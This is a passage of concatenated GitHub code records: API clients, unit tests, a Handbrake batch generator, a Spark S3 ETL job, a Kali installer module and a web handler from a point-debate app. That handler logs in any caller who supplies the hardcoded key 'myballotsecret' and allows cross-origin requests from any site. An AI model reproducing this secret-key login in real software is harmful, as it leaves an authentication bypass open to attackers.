requests_mock = Mock()\n response = requests_mock.return_value\n response.json.return_value = mock_single_movie\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n\n single_movie = tmdb_client.get_single_movie(movie_id='Monkey')\n assert single_movie == mock_single_movie \n\ndef test_get_single_movie_cast(monkeypatch):\n mock_single_movie_cast = ['Monkey 1', 'Monkey2']\n requests_mock = Mock()\n response = requests_mock.return_value\n response.json.return_value = mock_single_movie_cast\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n \n single_movie_cast = tmdb_client.get_single_movie(movie_id='Monkey')\n assert single_movie_cast == mock_single_movie_cast \n \ndef test_get_movie_images(monkeypatch):\n mock_movie_images = 'Image.jpg'\n requests_mock = Mock()\n response = requests_mock.return_value\n response.json.return_value = mock_movie_images\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n\n movie_images = tmdb_client.get_movie_images(movie_id='Monkey')\n assert movie_images == mock_movie_images\n\nfrom main import app\nimport pytest\n\n@pytest.mark.parametrize(\"list_type\", [\"now_playing\", \"upcoming\", \"popular\", \"top_rated\"])\ndef test_homepage(monkeypatch, list_type):\n api_mock = Mock(return_value={'results': []})\n monkeypatch.setattr(\"tmdb_client.call_tmdb_api\", api_mock)\n\n with app.test_client() as client:\n response = client.get(f\"/?list_name={list_type}\")\n assert response.status_code == 200\n api_mock.assert_called_once_with(f\"movie/{list_type}\")\n","repo_name":"KarZyl/movies_catalogue","sub_path":"tests/test_tmdb.py","file_name":"test_tmdb.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5543507151","text":"from BitSightAPI.client import Session\n\n\nclass Portfolio(Session):\n \"\"\"\n Portfolio class\n \"\"\"\n\n def __init__(self, session, company_guid='', user_guid=''):\n self.api_key = session.api_key\n self.api_endpoint = '/v1/portfolio'\n self.api_variables = {\n 'company_guid': company_guid,\n 'user_guid': user_guid\n }\n self.api_paths = {\n 'root': '/',\n 'breaches': '/breaches',\n 'contacts': '/contacts',\n 'edit contacts': '/contacts/%(user_guid)s',\n 'custom ids': '/entity-custom-ids',\n 'filters': '/filters',\n 'guids': '/guids',\n 'products': '/products',\n 'providers': '/providers',\n 'provider dependents': '/providers/%(company_guid)s/companies',\n 'provider products': '/providers/%(company_guid)s/products',\n 'ratings': '/ratings',\n 'statistics': '/statistics'\n }\n self.api_params = [\n 'company_guid',\n 'custom_id',\n 'email',\n 'end',\n 'exclude_alerts_only',\n 'fields',\n 'folder',\n 'formal_name',\n 'format',\n 'friendly_name',\n 'guid',\n 'name',\n 'phone_number',\n 'quarters_back',\n 'rating_date',\n 'show_ips',\n 'show_event_evidence',\n 'start',\n 'tier',\n 'types'\n ]","repo_name":"InfosecSapper/BitSightAPI","sub_path":"BitSightAPI/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"40910726096","text":"import json\nimport logging\nfrom authhandler import AuthHandler\nfrom models.point import Point\nfrom models.source import Source\nfrom models.reportEvent import ReportEvent\n\nfrom google.appengine.ext import ndb\n\nclass NewPoint(AuthHandler):\n @ndb.toplevel\n def newPoint(self): \n user = self.current_user\n resultJSON = 
json.dumps({'result': False, 'error': 'Not authorized'})\n secretKey = self.request.get('secret')\n \n if not user: \n if (secretKey == 'myballotsecret'):\n self.loginBySecretKey(secretKey)\n user = self.current_user\n if user:\n self.response.headers['Access-Control-Allow-Origin'] = '*'\n\n if user: \n if not self.request.get('title'): \n resultJSON = json.dumps({'result': False, 'error': 'Your point must have a title'})\n else:\n sourcesURLs=json.loads(self.request.get('sourcesURLs')) if self.request.get('sourcesURLs') else None\n sourcesNames=json.loads(self.request.get('sourcesNames')) if self.request.get('sourcesNames') else None\n newPoint, newPointRoot = Point.create(\n title=self.request.get('title'),\n content=self.request.get('content'),\n summaryText=self.request.get('plainText'),\n user=user,\n imageURL=self.request.get('imageURL'),\n imageAuthor=self.request.get('imageAuthor'),\n imageDescription=self.request.get('imageDescription'),\n sourceURLs=sourcesURLs,\n sourceNames=sourcesNames)\n \n if newPoint: \n recentlyViewed, sources = yield user.getRecentlyViewed_async( \\\n excludeList=[newPoint.key.parent()] + \\\n newPoint.getLinkedPointsRootKeys(\"supporting\") + \\\n newPoint.getLinkedPointsRootKeys(\"counter\")), \\\n newPoint.getSources_async()\n \n templateValues = {\n 'point': newPoint,\n 'pointRoot': newPointRoot,\n 'recentlyViewedPoints': recentlyViewed,\n 'supportingPoints': None,\n 'counterPoints': None,\n 'supportedPoints':newPointRoot.getBacklinkPoints(\"supporting\"),\n 'counteredPoints':newPointRoot.getBacklinkPoints(\"counter\"),\n 'sources': sources,\n 'user': user,\n 'voteValue': 0,\n 'ribbonValue': False,\n 'currentArea':self.session.get('currentArea'),\n 'currentAreaDisplayName':self.session.get('currentAreaDisplayName')\n }\n html = self.template_render('pointContent.html', templateValues)\n\n templateValues = {\n 'user': self.current_user, \n 'pointRoot': newPointRoot,\n 'comments': None\n } \n commentHTML = self.template_render('pointComments.html', templateValues)\n resultJSON = json.dumps({'result': True, \n 'pointURL': newPoint.url,\n 'title':newPoint.title,\n 'html': html,\n 'commentHTML': commentHTML,\n 'rootKey': newPointRoot.key.urlsafe()\n })\n ReportEvent.queueEventRecord(user.key.urlsafe(), newPoint.key.urlsafe(), None, \"Create Point\") \n else:\n resultJSON = json.dumps({'result': False, 'error': 'Failed to create point.'})\n else:\n resultJSON = json.dumps({'result': False, 'error': 'You appear not to be logged in.'})\n\n self.response.headers[\"Pragma\"]=\"no-cache\"\n self.response.headers[\"Cache-Control\"]=\"no-cache, no-store, must-revalidate, pre-check=0, post-check=0\"\n self.response.headers[\"Expires\"]=\"Thu, 01 Dec 1994 16:00:00\" \n self.response.headers[\"Content-Type\"] = 'application/json; charset=utf-8'\n self.response.out.write(resultJSON)\n\n","repo_name":"aaronlifshin/whysaurus","sub_path":"handlers/newpoint.py","file_name":"newpoint.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"37355955660","text":"import functools\nimport numpy as np\nfrom absl.testing import parameterized\n\nfrom tensorflow.python import ipu\nfrom tensorflow.python.client import session as sl\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import gradients_impl\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import variables\nfrom 
tensorflow.python.ops import variable_scope\nfrom tensorflow.python.platform import googletest\n\nTEST_CASES = ({\n 'testcase_name': 'a_columns',\n 'a_shape': [8, 16],\n 'b_shape': [16, 5],\n 'transpose_a': False,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_columns_tb',\n 'a_shape': [32, 8],\n 'b_shape': [1, 8],\n 'transpose_a': False,\n 'transpose_b': True,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_columns_ta',\n 'a_shape': [4, 8],\n 'b_shape': [4, 4],\n 'transpose_a': True,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_columns_ta_tb',\n 'a_shape': [64, 32],\n 'b_shape': [128, 64],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 8,\n 'serialization_dimension': 'a_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns',\n 'a_shape': [4, 21],\n 'b_shape': [21, 8],\n 'transpose_a': False,\n 'transpose_b': False,\n 'serialization_factor': 3,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns_tb',\n 'a_shape': [4, 72],\n 'b_shape': [1, 72],\n 'transpose_a': False,\n 'transpose_b': True,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns_ta',\n 'a_shape': [4, 8],\n 'b_shape': [4, 4],\n 'transpose_a': True,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'a_rows_b_columns_ta_tb',\n 'a_shape': [4, 5],\n 'b_shape': [5, 4],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 4,\n 'serialization_dimension': 'a_rows_b_columns',\n}, {\n 'testcase_name': 'b_rows',\n 'a_shape': [4, 4],\n 'b_shape': [4, 8],\n 'transpose_a': False,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'b_rows_tb',\n 'a_shape': [4, 4],\n 'b_shape': [44, 4],\n 'transpose_a': False,\n 'transpose_b': True,\n 'serialization_factor': 2,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'b_rows_ta',\n 'a_shape': [4, 8],\n 'b_shape': [4, 4],\n 'transpose_a': True,\n 'transpose_b': False,\n 'serialization_factor': 2,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'b_rows_ta_tb',\n 'a_shape': [4, 5],\n 'b_shape': [8, 4],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 4,\n 'serialization_dimension': 'b_rows',\n}, {\n 'testcase_name': 'a_columns_serial_factor_1',\n 'a_shape': [4, 5],\n 'b_shape': [5, 4],\n 'transpose_a': True,\n 'transpose_b': True,\n 'serialization_factor': 1,\n 'serialization_dimension': 'a_columns',\n})\n\n\ndef _getTestCases():\n from copy import deepcopy\n\n test_cases = list(TEST_CASES)\n # Add test cases with a batch dim for a.\n for case in deepcopy(TEST_CASES):\n case['testcase_name'] += \"_batch_a\"\n case['a_shape'] = [2] + case['a_shape']\n test_cases.append(case)\n # Add test cases with a batch dim for b.\n for case in deepcopy(TEST_CASES):\n case['testcase_name'] += \"_batch_b\"\n case['b_shape'] = [3] + case['b_shape']\n test_cases.append(case)\n # Add test cases with a batch dim for a and b.\n for case in deepcopy(TEST_CASES):\n case['testcase_name'] += \"_batch_a_batch_b\"\n case['a_shape'] = [3] + case['a_shape']\n case['b_shape'] = [3] + case['b_shape']\n test_cases.append(case)\n return test_cases\n\n\n# Note that in this test we expect small 
numerical differences as serializing\n# means that some operations are done in a different order.\nclass SerializedMatmulTest(test_util.TensorFlowTestCase,\n parameterized.TestCase):\n def setUp(self):\n super().setUp()\n np.random.seed(0xDEADBEEF)\n\n def _testOnCpu(self, model_fn, placeholders, inputs, sess, scope_name=None):\n scope_name = scope_name if scope_name else \"cpu_vs\"\n with variable_scope.variable_scope(scope_name, use_resource=True):\n output = model_fn(*placeholders)\n sess.run(variables.global_variables_initializer())\n return sess.run(output, inputs)\n\n def _testOnIpu(self, model_fn, placeholders, inputs, sess, scope_name=None):\n with ipu.scopes.ipu_scope('/device:IPU:0'):\n scope_name = scope_name if scope_name else \"ipu_vs\"\n with variable_scope.variable_scope(scope_name, use_resource=True):\n output = ipu.ipu_compiler.compile(model_fn, placeholders)\n ipu.utils.move_variable_initialization_to_cpu()\n sess.run(variables.global_variables_initializer())\n return sess.run(output, inputs)\n\n @parameterized.named_parameters(*_getTestCases())\n @test_util.deprecated_graph_mode_only\n def testSerializedMatmul(self, a_shape, b_shape, transpose_a, transpose_b,\n serialization_factor, serialization_dimension):\n a = array_ops.placeholder(np.float32, a_shape)\n b = array_ops.placeholder(np.float32, b_shape)\n\n def cpu_matmul(a, b):\n return math_ops.matmul(a,\n b,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n def ipu_matmul(a, b):\n return ipu.math_ops.serialized_matmul(a,\n b,\n serialization_factor,\n serialization_dimension,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n a_val = np.random.normal(2.0, 2.0, a_shape)\n b_val = np.random.normal(2.0, 2.0, b_shape)\n\n with sl.Session() as sess:\n cpu_output = self._testOnCpu(cpu_matmul, [a, b], {\n a: a_val,\n b: b_val\n }, sess)\n ipu_output = self._testOnIpu(ipu_matmul, [a, b], {\n a: a_val,\n b: b_val\n }, sess)\n self.assertAllClose(cpu_output, ipu_output[0], atol=1.e-05, rtol=1.e-05)\n\n @parameterized.named_parameters(*_getTestCases())\n @test_util.deprecated_graph_mode_only\n def testSerializedMatmulGrad(self, a_shape, b_shape, transpose_a,\n transpose_b, serialization_factor,\n serialization_dimension):\n a_val = array_ops.constant(np.random.normal(2.0, 2.0, a_shape),\n dtype=np.float32)\n b_val = array_ops.constant(np.random.normal(2.0, 2.0, b_shape),\n dtype=np.float32)\n\n def matmul(a, b):\n return math_ops.matmul(a,\n b,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n def serialized_matmul(a, b):\n return ipu.math_ops.serialized_matmul(a,\n b,\n serialization_factor,\n serialization_dimension,\n transpose_a=transpose_a,\n transpose_b=transpose_b)\n\n def model_fn(matmul_fn):\n a = variable_scope.get_variable(\"a\", initializer=a_val)\n b = variable_scope.get_variable(\"b\", initializer=b_val)\n c = matmul_fn(a, b)\n # Not a real loss function, but good enough for testing backprop.\n loss = math_ops.reduce_sum(c)\n outputs = gradients_impl.gradients(loss, [a, b])\n outputs.append(loss)\n return outputs\n\n ipu_fn = functools.partial(model_fn, matmul)\n ipu_serial_fn = functools.partial(model_fn, serialized_matmul)\n\n with sl.Session() as sess:\n a, b, l = self._testOnIpu(ipu_fn, [], {}, sess, \"normal\")\n serial_a, serial_b, serial_l = self._testOnIpu(ipu_serial_fn, [], {},\n sess, \"serial\")\n\n self.assertAllClose(a, serial_a, atol=1.e-05, rtol=1.e-05)\n self.assertAllClose(b, serial_b, atol=1.e-05, rtol=1.e-05)\n self.assertAllClose([l], [serial_l], atol=1.e-05, 
rtol=1.e-05)\n\n\nif __name__ == \"__main__\":\n googletest.main()\n","repo_name":"hephaex/tensorflow-1","sub_path":"tensorflow/python/ipu/tests/math_ops_test.py","file_name":"math_ops_test.py","file_ext":"py","file_size_in_byte":8685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"74523833386","text":"import subprocess, sys, os, re, shlex, json, csv, os.path, time\r\nprint ('Handbrake batch file creator V2 - T.Barnard 2020')\r\n\r\ndef Handbrake_batch_maker_list (input_file_list, input_path, output_path, script_name,x265, run_compress):\r\n \r\n #store value of x265 so it can be set back if adjusted\r\n stored_x265 = x265\r\n # Check if output path exists\r\n if os.path.isdir(str(output_path)):\r\n print ('Output Directory = ', str(output_path))\r\n else:\r\n print ('Error - Output path does not exist')\r\n quit()\r\n \r\n # open files \r\n batchfile = open(script_name, \"w\") # Output Batch file\r\n batchfile.write('powercfg /s 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c\\n')\r\n if run_compress == True:\r\n subprocess.call('powercfg /s 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c')\r\n # Create List of files from input directory\r\n for dirname, subFolders, files in os.walk(input_path):\r\n # check if sub directories exist on output path, Add command to create directory if subfolders do not exist\r\n for subFoldersname in subFolders:\r\n Full_path = os.path.join(output_path, subFoldersname)\r\n if os.path.isdir(Full_path):\r\n print ('Output sub directory ' + Full_path + ' exists')\r\n else:\r\n outputsubdir = str(os.path.join(str(output_path),dirname, subFoldersname))\r\n outputsubdir = outputsubdir.replace(str(input_path), str(output_path))\r\n batchfile.write('mkdir \"' + outputsubdir + '\"\\n')\r\n if run_compress == True:\r\n os.mkdir(outputsubdir)\r\n \t \t\t\r\n print (input_file_list)\r\n \r\n # Specify outout path\r\n path_out = str(output_path)\r\n \r\n # Perform FFprobe on each .mkv file in every sub-directory\r\n for files in input_file_list:\r\n if \".mkv\" in files:\r\n \r\n #Detemine full path of file\r\n #full_file_path = str(input_path) + '\\\\' + files\r\n full_file_path = files\r\n \t\r\n # Invoke FFProbe, capture output and any errors\r\n p = subprocess.Popen(['ffprobe', '-print_format', 'json', '-show_format', '-show_streams', full_file_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE, )\r\n out, err = p.communicate()\r\n \r\n # create empty list for audio tracks\r\n AudioTrackList = []\r\n \r\n # create empty list for subtitles tracks\r\n SubTrackList = []\r\n \t\r\n #Import JSON string\r\n FfprobeJsonParsed = json.loads(out.decode('utf-8'))\r\n \r\n subtitle_count = 1\r\n # Convert to .csv\r\n print(FfprobeJsonParsed['format']['filename'])\r\n filename = (FfprobeJsonParsed['format']['filename'])\r\n VideoData = FfprobeJsonParsed['streams']\r\n print(len(VideoData), ' streams detected')\r\n forced_subtitles = False\r\n for stream in range(0, (len(VideoData))):\r\n if VideoData[stream]['codec_type'] == 'video':\r\n print( VideoData[stream]['index'], VideoData[stream]['codec_type'], VideoData[stream]['codec_name'], VideoData[stream]['height'], VideoData[stream]['width'], VideoData[stream]['display_aspect_ratio'], VideoData[stream]['sample_aspect_ratio'])\r\n videotrack = stream\r\n if VideoData[stream]['height'] == 1080:\r\n quality = 24\r\n else:\r\n quality = 20\r\n x265 = False\r\n if (VideoData[stream]['codec_type'] == 'audio' and VideoData[stream]['tags']['language'] == 'eng'):\r\n print(VideoData[stream]['index'], 
VideoData[stream]['codec_type'], VideoData[stream]['codec_name'], VideoData[stream]['channels'],VideoData[stream]['tags']['language'] )\r\n # add to list of audio tracks\r\n AudioTrackList.append(stream)\r\n \r\n if (VideoData[stream]['codec_type'] == 'subtitle' and VideoData[stream]['tags']['language'] == 'eng'):\r\n print(VideoData[stream]['index'], VideoData[stream]['codec_type'], VideoData[stream]['disposition']['forced'],VideoData[stream]['tags']['language'] )\r\n forced_subtitle_track = 0\r\n forced_subtitles = False\r\n # Set flag for forced sub-titles\r\n if VideoData[stream]['disposition']['forced'] == 1:\r\n forced_subtitles = True\r\n forced_subtitle_track = str(subtitle_count)\r\n # add to list of subtitle tracks\r\n SubTrackList.append(subtitle_count)\r\n if (VideoData[stream]['codec_type'] == 'subtitle'):\r\n subtitle_count = subtitle_count + 1\r\n # Print tracks to be processed\r\n print('Video Track = ', videotrack)\t\r\n print('English Audio Tracks = ', AudioTrackList)\r\n \t\r\n \t# convert subtitle List to string\r\n SubTrackString = ''\r\n \t\r\n for p in range(0, len(SubTrackList)): SubTrackString = SubTrackString + str(SubTrackList[p]) + ','\r\n print(SubTrackString)\r\n print('English Subtitle Tracks = ', SubTrackList ) \r\n \r\n # Create subtitle string\r\n if len(SubTrackList) == 0:\r\n subtitle_command = ''\r\n else:\r\n subtitle_command = '--subtitle ' + SubTrackString\r\n # Add quotes around filename\r\n filename = '\"' + str(filename) + '\"'\r\n \t\r\n # Set output filename, replace base input path with base output path\r\n filenameout = filename.replace(str(input_path), str(output_path))\r\n \r\n \t# Generate Handbrake command line\r\n # Encoder settings\r\n if (quality == 20 or x265 == False):\r\n encoder_setting = '--encoder nvenc_h264 --encoder-preset slow '\r\n else:\r\n encoder_setting = '--encoder nvenc_h265 --encoder-preset medium '\r\n # Forced Subtitles\r\n if forced_subtitles == True:\r\n subtitle_command = subtitle_command + '--subtitle-forced '+ forced_subtitle_track\r\n\r\n handbrake_command_line = 'handbrakecli --input ' + str(filename) + ' --output ' + str(filenameout) + ' --format mkv --markers ' + encoder_setting + '--quality ' + str(quality) + ' --audio-lang-list eng --all-audio --aencoder copy ' + subtitle_command +'\\n'\r\n print(handbrake_command_line)\r\n batchfile.write(handbrake_command_line)\r\n if run_compress == True:\r\n print('compressing!')\r\n subprocess.call(handbrake_command_line)\r\n\r\n x265 = stored_x265\r\n \r\n batchfile.write('powercfg /s 381b4222-f694-41f0-9685-ff5bb260df2e\\n') \r\n batchfile.close()\r\n if run_compress == True:\r\n subprocess.call('powercfg /s 381b4222-f694-41f0-9685-ff5bb260df2e')\r\n time.sleep(10)\r\n return\r\n","repo_name":"tonyramponi/HandbrakeScanAndBatch","sub_path":"Handbrake_batch_maker_list.py","file_name":"Handbrake_batch_maker_list.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4248118821","text":"#!/usr/bin/env python3\n\nfrom lib.automation import *\n\nclass InstallerTemplate:\n\n def check(self, config):\n return True if command_exists(\"git\") else \"'git' package not installed\"\n\n def install(self, config):\n proj = \"oblique/create_ap\"\n print_status(\"Cloning {0}...\".format(proj), 1)\n github_clone(proj, \"/opt/\")\n folder_name = \"/opt/{0}-git\".format(proj.replace('/','_').lower())\n run_command(\"cd {0}; make install\".format(folder_name))\n run_command(\"rm -rf 
{0}\".format(folder_name))\n print_success(\"Done!\", 1)\n","repo_name":"thomascannon/kali-setup","sub_path":"modules/create_ap.py","file_name":"create_ap.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42775229497","text":"import numpy as np\n\nfrom .base_plots import TimePlot\n\n\nclass RewardPlot(TimePlot):\n \"\"\"Plot to display the instantaneous reward during the episode\"\"\"\n\n def __init__(self):\n super().__init__()\n self._reward_range = None\n self._reward_line = None\n self._reward_data = None\n self._reward_line_cfg = self._default_time_line_cfg.copy()\n self._reward_line_cfg['color'] = self._colors[-1]\n\n def initialize(self, axis):\n super().initialize(axis)\n self._reward_line, = self._axis.plot(self._x_data, self._reward_data, **self._reward_line_cfg)\n self._lines.append(self._reward_line)\n\n def set_env(self, env):\n super().set_env(env)\n self._reward_range = env.reward_range\n self._reward_data = np.full(shape=self._x_data.shape, fill_value=np.nan)\n self._y_data = [self._reward_data]\n min_limit = self._reward_range[0]\n max_limit = self._reward_range[1]\n spacing = 0.1 * (max_limit - min_limit)\n self._y_lim = (min_limit - spacing, max_limit + spacing)\n self._label = 'reward'\n\n def reset_data(self):\n super().reset_data()\n self._reward_data = np.full(shape=self._x_data.shape, fill_value=np.nan)\n\n def on_step_end(self, k, state, reference, reward, terminated):\n idx = self.data_idx\n self._x_data[idx] = self._t\n self._reward_data[idx] = reward\n super().on_step_end(k, state, reference, reward, terminated)\n","repo_name":"upb-lea/gym-electric-motor","sub_path":"gym_electric_motor/visualization/motor_dashboard_plots/reward_plot.py","file_name":"reward_plot.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":249,"dataset":"github-code","pt":"37"} +{"seq_id":"36207164098","text":"#!/usr/bin/python \n# -*- coding=utf8 -*-\n# Created by carrot on 2017/8/23.\n\n\"\"\"\n题目:利用条件运算符的嵌套来完成此题:学习成绩>=90分的同学用A表示,60-89分之间的用B表示,60分以下的用C表示。\n程序分析:程序分析:(a>b)?a:b这是条件运算符的基本例子。\n\"\"\"\n\ndef main():\n score = float(input(\"输入分数:\"))\n if score >= 90:\n grade = \"A\"\n elif score >= 60:\n grade = \"B\"\n else:\n grade = \"C\"\n print(\"分数:%.1f 级别:%s\" % (score, grade))\n\n\nif __name__ == '__main__':\n main()","repo_name":"116pythonZS/YiBaiExample","sub_path":"015.py","file_name":"015.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22440957358","text":"\"\"\"\nThis script is used to extract data from S3, process that data using Spark, and\nload the data back into S3. This will be done in two steps:\n\n 1. Load song_data and log_data from S3\n 2. Process the data into analytics tables using Spark\n 3. 
Load them back into S3\n\"\"\"\n\nimport configparser\nimport os\nfrom datetime import datetime\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import (\n monotonically_increasing_id,\n col,\n date_format,\n dayofmonth,\n hour,\n month,\n udf,\n weekofyear,\n year,\n)\n\nconfig = configparser.ConfigParser()\nconfig.read(\"dl.cfg\")\n\nos.environ[\"AWS_ACCESS_KEY_ID\"] = (\n config.get(\"AWS\", \"AWS_ACCESS_KEY_ID\")\n)\nos.environ[\"AWS_SECRET_ACCESS_KEY\"] = (\n config.get(\"AWS\", \"AWS_SECRET_ACCESS_KEY\")\n)\n\n\ndef create_spark_session() -> SparkSession:\n \"\"\"\n Create a Spark session\n\n Parameters:\n None\n\n Returns:\n SparkSession: Spark session\n \"\"\"\n\n spark = SparkSession.builder.config(\n \"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:3.3.1\"\n ).getOrCreate()\n\n return spark\n\n\ndef process_song_data(\n spark: SparkSession,\n input_data: str,\n output_data: str\n) -> None:\n \"\"\"\n Process song data\n\n Parameters:\n spark (SparkSession): Spark session\n input_data (str): Input data path\n output_data (str): Output data path\n\n Returns:\n None\n \"\"\"\n # get filepath to song data file\n song_data = input_data + \"song_data/*/*/*/*.json\"\n\n # read song data file\n df = spark.read.json(song_data)\n\n # extract columns to create songs table\n songs_table = df.select(\n col(\"song_id\"),\n col(\"title\"),\n col(\"artist_id\"),\n col(\"year\"),\n col(\"duration\"),\n col(\"artist_name\"),\n ).distinct()\n\n # write songs table to parquet files partitioned by year and artist\n songs_table.write.partitionBy(\"year\", \"artist_id\").parquet(\n output_data + \"songs_table\", mode=\"overwrite\"\n )\n\n # extract columns to create artists table\n artists_table = df.select(\n col(\"artist_id\"),\n col(\"artist_name\").alias(\"name\"),\n col(\"artist_location\").alias(\"location\"),\n col(\"artist_latitude\").alias(\"latitude\"),\n col(\"artist_longitude\").alias(\"longitude\"),\n ).distinct()\n\n # write artists table to parquet files\n artists_table.write.parquet(\n output_data + \"artists_table\",\n mode=\"overwrite\"\n )\n\n\ndef process_log_data(\n spark: SparkSession,\n input_data: str,\n output_data: str\n) -> None:\n \"\"\"\n Process log data\n\n Parameters:\n spark (SparkSession): Spark session\n input_data (str): Input data path\n output_data (str): Output data path\n\n Returns:\n None\n \"\"\"\n # get filepath to log data file\n log_data = input_data + \"log_data/*/*/*.json\"\n\n # read log data file\n df = spark.read.json(log_data)\n\n # filter by actions for song plays\n df = df.filter(df.page == \"NextSong\")\n\n # extract columns for users table\n users_table = df.select(\n col(\"userId\").alias(\"user_id\"),\n col(\"firstName\").alias(\"first_name\"),\n col(\"lastName\").alias(\"last_name\"),\n col(\"gender\"),\n col(\"level\"),\n ).distinct()\n\n # write users table to parquet files\n users_table.write.parquet(output_data + \"users_table\", mode=\"overwrite\")\n\n # create timestamp column from original timestamp column\n get_timestamp = udf(\n lambda x: (\n datetime\n .fromtimestamp(x / 1000.0)\n .strftime(\"%Y-%m-%d %H:%M:%S\")\n )\n )\n\n df = df.withColumn(\"timestamp\", get_timestamp(df.ts))\n\n # create datetime column from original timestamp column\n get_datetime = udf(\n lambda x: datetime.fromtimestamp(x / 1000.0).strftime(\"%Y-%m-%d\")\n )\n df = df.withColumn(\"datetime\", get_datetime(df.ts))\n\n # extract columns to create time table\n time_table = df.select(\n col(\"timestamp\").alias(\"start_time\"),\n 
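# the fields below derive the calendar grains (hour, day, week, month, year, weekday) from the same event timestamp\n 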
hour(col(\"timestamp\")).alias(\"hour\"),\n dayofmonth(col(\"timestamp\")).alias(\"day\"),\n weekofyear(col(\"timestamp\")).alias(\"week\"),\n month(col(\"timestamp\")).alias(\"month\"),\n year(col(\"timestamp\")).alias(\"year\"),\n date_format(col(\"timestamp\"), \"E\").alias(\"weekday\"),\n ).distinct()\n\n # write time table to parquet files partitioned by year and month\n time_table.write.partitionBy(\"year\", \"month\").parquet(\n output_data + \"time_table\", mode=\"overwrite\"\n )\n\n # read in song data to use for songplays table\n song_df = spark.read.parquet(output_data + \"songs_table\")\n\n # extract columns from joined song and log datasets to create songplays table\n songplays_table = df.join(\n song_df,\n (col(\"song\") == col(\"title\")) & (col(\"artist\") == col(\"artist_name\"))\n ).select(\n monotonically_increasing_id().alias(\"songplay_id\"),\n col(\"timestamp\").alias(\"start_time\"),\n col(\"userId\").alias(\"user_id\"),\n col(\"level\"),\n col(\"song_id\"),\n col(\"artist_id\"),\n col(\"sessionId\").alias(\"session_id\"),\n col(\"location\"),\n col(\"userAgent\").alias(\"user_agent\"),\n year(col(\"timestamp\")).alias(\"year\"),\n month(col(\"timestamp\")).alias(\"month\"),\n )\n\n # write songplays table to parquet files partitioned by year and month\n songplays_table.write.partitionBy(\"year\", \"month\").parquet(\n output_data + \"songplays_table\", mode=\"overwrite\"\n )\n\n\ndef main() -> None:\n \"\"\"\n Main function\n \"\"\"\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://udacity-sparkify-data-lake/processed_data/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cadu1996/sparkify-data-lake","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24227378287","text":"\n\"\"\"\nversion 0.11\n\npython3 script to quickly view the last N days of recovered data\nwith the idea being to check the site is working OK before leaving\n\ntested on windows, linux, and mac\n\nrequires: obspy\n\n/path/to/sdcard should be the root directory! for a typical SD card this is the folder that contains STA01miniSEED/\n\n\"\"\"\n\nimport sys\n\nif len(sys.argv) < 2:\n\tprint(\"to run: ./field_psdscan.py </path/to/sdcard> <inst type (default TC120_100)>\")\n\texit()\n\n\n########set parameters here\n\nnum_days_lookback = 3 #how many days to look at. the most recent will be taken. \n#figdir = None\nfigdir = \"./field_psd_figs\" #where to store figures (set to \"\" or None\" if you don't want to save any)\npsd_len = 1800 #length of psd window (seconds). set to lower (e.g. 
